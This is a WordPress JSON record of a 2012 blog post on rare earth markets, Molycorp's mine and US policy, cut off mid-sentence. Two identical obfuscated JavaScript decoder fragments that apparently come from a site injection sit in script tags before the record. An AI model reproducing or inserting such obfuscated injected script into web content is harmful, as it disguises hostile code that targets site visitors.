<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script>{"id":1695,"date":"2012-01-30T22:19:19","date_gmt":"2012-01-31T05:19:19","guid":{"rendered":"http:\/\/www.jsharf.com\/view\/?p=1695"},"modified":"2012-08-09T05:20:30","modified_gmt":"2012-08-09T12:20:30","slug":"how-not-to-manage-rare-earths","status":"publish","type":"post","link":"https:\/\/www.jsharf.com\/view\/?p=1695","title":{"rendered":"How Not To Manage Rare Earths"},"content":{"rendered":"<p>Rare earths were in the news a lot in 2011.\u00a0 Right now, it seems as though the news coverage paralleled the bubble in prices, but there&#8217;s no reason to be complacent.\u00a0 The government continues to make mistakes in dealing with these resources, missing opportunities to do it right, and eventually costing not only the taxpayer in cash, but also the country in national security.<\/p>\n<p>First, a refresher on what rare earths are used in:<\/p>\n<p><a href=\"http:\/\/www.innovationnewsdaily.com\/108-infographic-energy-critical-elements-to-watch.html\" target=\"_blank\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone\" src=\"http:\/\/www.innovationnewsdaily.com\/images\/i\/120\/original\/rare-earth-minerals-infographic-110228a.jpg\" alt=\"\" width=\"585\" height=\"1525\" \/><\/a><\/p>\n<p>Late in 2010, Colorado-based Molycorp announced that it was ready to reopen one of the world&#8217;s richest rare earth mines in California, about an hour south of Las Vegas.\u00a0 The stock price soared, and soared even more on the news that it was working on vertical integration with a prime use of rare earths, magnets for wind turbines.\u00a0 Then, in mid-2011, China announced that it would begin cutting back on its rare earth quotas.\u00a0 Initially interpreted as China throwing it weight around, it now is clear that they were simply responding to demand information that they, as a near-monopoly, had before everyone else.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone\" src=\"http:\/\/www.jsharf.com\/view\/images\/RareEarth\/MolycorpStockPrice.jpg\" alt=\"\" width=\"700\" height=\"312\" \/><\/p>\n<p>The metal prices themselves have followed suit, in a number of cases down well over 50% from their mid-2011 highs:<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone\" src=\"http:\/\/www.jsharf.com\/view\/images\/RareEarth\/GdOxidePrice.jpg\" alt=\"\" width=\"220\" height=\"170\" \/><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.jsharf.com\/view\/images\/RareEarth\/MischPrice.jpg\" alt=\"\" width=\"220\" height=\"170\" \/><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.jsharf.com\/view\/images\/RareEarth\/DyOxidePrice.jpg\" alt=\"\" width=\"220\" height=\"170\" \/><img decoding=\"async\" src=\"http:\/\/www.jsharf.com\/view\/images\/RareEarth\/PrNdPrice.jpg\" alt=\"\" \/><\/p>\n<p>Some of this was simply a bubble bursting, but it&#8217;s also possible that the catalyst was more than just an amplified cyclical downturn.\u00a0 Vestas, along with a number of other wind companies, has found out that government subsidies aren&#8217;t forever, as the Spanish, Germans, and even the Americans are cutting direct subsidies to wind turbines.\u00a0 At the same time, other mines are increasing output, with Chile&#8217;s molybdenum output up 11% in 2011, and Toyota is <a href=\"http:\/\/www.huffingtonpost.com\/2012\/01\/23\/toyota-prius-rare-earths_n_1222883.html\" target=\"_blank\">threatening to release a rare-earths-free Prius<\/a>.\u00a0 Rare earths prices are starting to stabilize, and it&#8217;s hard to see them going much lower.<\/p>\n<p>While the world figures out a way around the problem, the US continues to throw environmental roadblocks in Molycorp&#8217;s way to actually re-opening the mine.\u00a0 Cong.
